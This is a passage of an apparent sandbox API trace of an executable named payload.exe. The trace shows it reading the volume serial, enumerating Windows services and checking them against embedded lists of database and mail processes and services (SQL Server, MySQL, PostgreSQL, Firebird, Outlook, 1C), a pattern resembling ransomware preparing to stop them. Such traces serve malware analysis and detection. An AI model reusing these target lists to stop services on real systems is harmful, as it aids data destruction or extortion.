lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x18fcac, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18fcac*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0031.363] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x62d440 | out: hHeap=0x5d0000) returned 1 [0031.363] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60a180, Size=0x82) returned 0x61b9b8 [0031.363] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60a1a0, Size=0x100) returned 0x61ba48 [0031.363] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x61b9b8, Size=0x104) returned 0x61bc70 [0031.363] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x61ba48, Size=0x200) returned 0x61bd80 [0031.364] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60a190 | out: hHeap=0x5d0000) returned 1 [0031.364] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61bd80 | out: hHeap=0x5d0000) returned 1 [0031.364] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61b5d0 | out: hHeap=0x5d0000) returned 1 [0031.364] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x62b5f0 | out: hHeap=0x5d0000) returned 1 [0031.364] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61e008 | out: hHeap=0x5d0000) returned 1 [0031.364] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x62b678 | out: hHeap=0x5d0000) returned 1 [0031.364] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61e038 | out: hHeap=0x5d0000) returned 1 [0031.364] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61bc70 | out: hHeap=0x5d0000) returned 1 [0031.364] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61e020 | out: hHeap=0x5d0000) returned 1 [0031.364] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61bb50 | out: hHeap=0x5d0000) returned 1 [0031.364] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61b5e8 | out: hHeap=0x5d0000) returned 1 [0031.364] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61bbe0 | out: hHeap=0x5d0000) returned 1 [0031.364] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61b600 | out: hHeap=0x5d0000) returned 1 [0031.364] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x61e020, Size=0x20) returned 0x605988 [0031.365] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x605988, Size=0x40) returned 0x606ad0 [0031.365] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60a160 | out: hHeap=0x5d0000) returned 1 [0031.365] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61dfa8 | out: hHeap=0x5d0000) returned 1 [0031.365] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61b528 | out: hHeap=0x5d0000) returned 1 [0031.365] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61dfd8 | out: hHeap=0x5d0000) returned 1 [0031.365] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x62b568 | out: hHeap=0x5d0000) returned 1 [0031.365] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61dfc0 | out: hHeap=0x5d0000) returned 1 [0031.365] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60a170 | out: hHeap=0x5d0000) returned 1 [0031.365] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61dff0 | out: hHeap=0x5d0000) returned 1 [0031.365] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x607ed0 | out: hHeap=0x5d0000) returned 1 [0031.365] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x606008 | out: hHeap=0x5d0000) returned 1 [0031.365] lstrlenW (lpString="%systemdrive%") returned 13 [0031.365] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x605960 | out: hHeap=0x5d0000) returned 1 [0031.365] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x62b458 | out: hHeap=0x5d0000) returned 1 [0031.365] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60a140 | out: hHeap=0x5d0000) returned 1 [0031.365] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091f0, lpParameter=0x60b430, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x100 [0032.201] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x65fe88, nSize=0x7fff | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\payload.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\payload.exe")) returned 0x31 [0032.940] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x65fe88 | out: hHeap=0x5d0000) returned 1 [0032.940] lstrlenW (lpString="payload.exe") returned 11 [0032.941] ExpandEnvironmentStringsW (in: lpSrc="%windir%;", lpDst=0x65fe88, nSize=0x8000 | out: lpDst="C:\\Windows;") returned 0xc [0032.941] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x670690 | out: hHeap=0x5d0000) returned 1 [0032.941] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x65fe88 | out: hHeap=0x5d0000) returned 1 [0032.941] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%", lpDst=0x64d468, nSize=0x7fff | out: lpDst="C:") returned 0x3 [0032.942] lstrlenW (lpString="C:\\") returned 3 [0032.942] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x18fcac, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18fcac*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0032.942] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x64d468 | out: hHeap=0x5d0000) returned 1 [0032.945] WaitForMultipleObjects (nCount=0x2, lpHandles=0x607c30*=0x100, bWaitAll=1, dwMilliseconds=0xffffffff) Thread: id = 2 os_tid = 0x96c Thread: id = 4 os_tid = 0x978 [0031.541] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x61dff0 [0031.541] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x61dff0, Size=0x20) returned 0x605988 [0031.541] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x605988, Size=0x40) returned 0x606b18 [0031.541] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x606b18, Size=0x80) returned 0x62b458 [0031.541] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x62b458, Size=0x100) returned 0x61bbc8 [0031.542] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x61dff0 [0031.542] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x61dff0, Size=0x20) returned 0x605988 [0031.542] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x605988, Size=0x40) returned 0x606b18 [0031.542] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x606b18, Size=0x80) returned 0x62b458 [0031.542] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x62b458, Size=0x100) returned 0x620080 [0031.542] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x61dff0 [0031.542] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x4) returned 0x60a140 [0031.542] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x61dfc0 [0031.542] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60a140, Size=0x8) returned 0x60a170 [0031.542] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x14) returned 0x606028 [0031.542] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60a170, Size=0x10) returned 0x61dfd8 [0031.542] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x18) returned 0x606048 [0031.542] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1a) returned 0x605988 [0031.542] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x61dfd8, Size=0x20) returned 0x6059b0 [0031.542] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1c) returned 0x6059d8 [0031.542] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x16) returned 0x606068 [0031.542] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1a) returned 0x605a00 [0031.542] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x61dfd8 [0031.542] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x4) returned 0x60a170 [0031.543] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40) returned 0x606b18 [0031.543] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60a170, Size=0x8) returned 0x60a140 [0031.543] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x3c) returned 0x606b60 [0031.543] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60a140, Size=0x10) returned 0x61dfa8 [0031.543] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x14) returned 0x606088 [0031.543] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x18) returned 0x6060a8 [0031.543] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x61dfa8, Size=0x20) returned 0x605a28 [0031.543] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x24) returned 0x607ed0 [0031.543] lstrlenW (lpString="1c8.exe;1cv77.exe;outlook.exe;postgres.exe;mysqld-nt.exe;mysqld.exe;sqlservr.exe;") returned 81 [0031.543] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x61bbc8 | out: hHeap=0x5d0000) returned 1 [0031.543] lstrlenW (lpString="FirebirdGuardianDefaultInstance;FirebirdServerDefaultInstance;sqlwriter;mssqlserver;sqlserveradhelper;") returned 102 [0031.543] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x620080 | out: hHeap=0x5d0000) returned 1 [0031.543] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x605ac8 [0031.544] EnumServicesStatusExW (in: hSCManager=0x605ac8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 0 [0031.544] GetLastError () returned 0xea [0031.544] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x11e4) returned 0x6230a8 [0031.544] EnumServicesStatusExW (in: hSCManager=0x605ac8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6230a8, cbBufSize=0x11e4, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6230a8, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 1 [0031.544] CloseServiceHandle (hSCObject=0x605ac8) returned 1 [0031.545] lstrlenW (lpString="Appinfo") returned 7 [0031.545] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0031.545] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0031.545] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0031.545] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0031.545] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0031.545] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0031.545] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0031.545] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0031.545] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0031.545] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0031.545] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0031.545] lstrlenW (lpString="AudioSrv") returned 8 [0031.545] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0031.545] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0031.545] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0031.545] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0031.545] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0031.545] lstrlenW (lpString="BFE") returned 3 [0031.545] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0031.545] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0031.545] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0031.545] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0031.545] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0031.545] lstrlenW (lpString="CryptSvc") returned 8 [0031.545] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0031.545] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0031.545] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0031.545] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0031.545] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0031.545] lstrlenW (lpString="CscService") returned 10 [0031.545] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0031.546] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0031.546] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0031.546] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0031.546] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0031.546] lstrlenW (lpString="DcomLaunch") returned 10 [0031.546] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0031.546] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0031.546] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0031.546] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0031.546] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0031.546] lstrlenW (lpString="Dhcp") returned 4 [0031.546] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0031.546] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0031.546] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0031.546] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0031.546] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0031.546] lstrlenW (lpString="Dnscache") returned 8 [0031.546] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0031.546] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0031.546] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0031.546] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0031.546] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0031.546] lstrlenW (lpString="DPS") returned 3 [0031.546] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0031.546] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0031.546] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0031.546] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0031.546] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0031.546] lstrlenW (lpString="eventlog") returned 8 [0031.546] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0031.546] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0031.546] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0031.546] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0031.546] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0031.546] lstrlenW (lpString="EventSystem") returned 11 [0031.547] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0031.547] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0031.547] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0031.547] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0031.547] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0031.547] lstrlenW (lpString="gpsvc") returned 5 [0031.547] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0031.547] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0031.547] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0031.547] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0031.547] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0031.547] lstrlenW (lpString="iphlpsvc") returned 8 [0031.547] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0031.547] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0031.547] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0031.547] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0031.547] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0031.547] lstrlenW (lpString="LanmanServer") returned 12 [0031.547] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0031.547] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0031.547] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0031.547] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0031.547] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0031.547] lstrlenW (lpString="LanmanWorkstation") returned 17 [0031.547] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0031.547] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0031.547] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0031.547] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0031.547] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0031.547] lstrlenW (lpString="lmhosts") returned 7 [0031.547] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0031.547] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0031.547] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0031.547] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0031.547] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0031.547] lstrlenW (lpString="MMCSS") returned 5 [0031.547] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0031.548] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0031.548] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0031.548] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0031.548] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0031.548] lstrlenW (lpString="MpsSvc") returned 6 [0031.548] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0031.548] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0031.548] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0031.548] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0031.548] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0031.548] lstrlenW (lpString="Netman") returned 6 [0031.548] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0031.548] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0031.548] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0031.548] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0031.548] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0031.548] lstrlenW (lpString="netprofm") returned 8 [0031.548] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0031.548] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0031.548] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0031.548] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0031.548] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0031.548] lstrlenW (lpString="NlaSvc") returned 6 [0031.548] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0031.548] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0031.548] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0031.548] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0031.548] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0031.548] lstrlenW (lpString="nsi") returned 3 [0031.548] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0031.548] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0031.548] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0031.548] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0031.548] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0031.548] lstrlenW (lpString="PcaSvc") returned 6 [0031.548] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0031.548] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0031.549] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0031.549] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0031.549] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0031.549] lstrlenW (lpString="PlugPlay") returned 8 [0031.549] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0031.549] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0031.549] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0031.549] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0031.549] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0031.549] lstrlenW (lpString="Power") returned 5 [0031.549] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0031.549] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0031.549] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0031.549] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0031.549] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0031.549] lstrlenW (lpString="ProfSvc") returned 7 [0031.549] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0031.549] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0031.549] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0031.549] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0031.549] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0031.549] lstrlenW (lpString="RpcEptMapper") returned 12 [0031.549] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0031.549] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0031.549] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0031.549] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0031.549] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0031.549] lstrlenW (lpString="RpcSs") returned 5 [0031.549] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0031.549] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0031.549] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0031.549] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0031.549] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0031.549] lstrlenW (lpString="SamSs") returned 5 [0031.549] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0031.550] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0031.550] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0031.550] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0031.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0031.550] lstrlenW (lpString="Schedule") returned 8 [0031.550] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0031.550] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0031.550] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0031.550] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0031.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0031.550] lstrlenW (lpString="SENS") returned 4 [0031.550] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0031.550] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0031.550] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0031.550] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0031.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0031.550] lstrlenW (lpString="ShellHWDetection") returned 16 [0031.550] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0031.550] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0031.550] lstrcmpiW 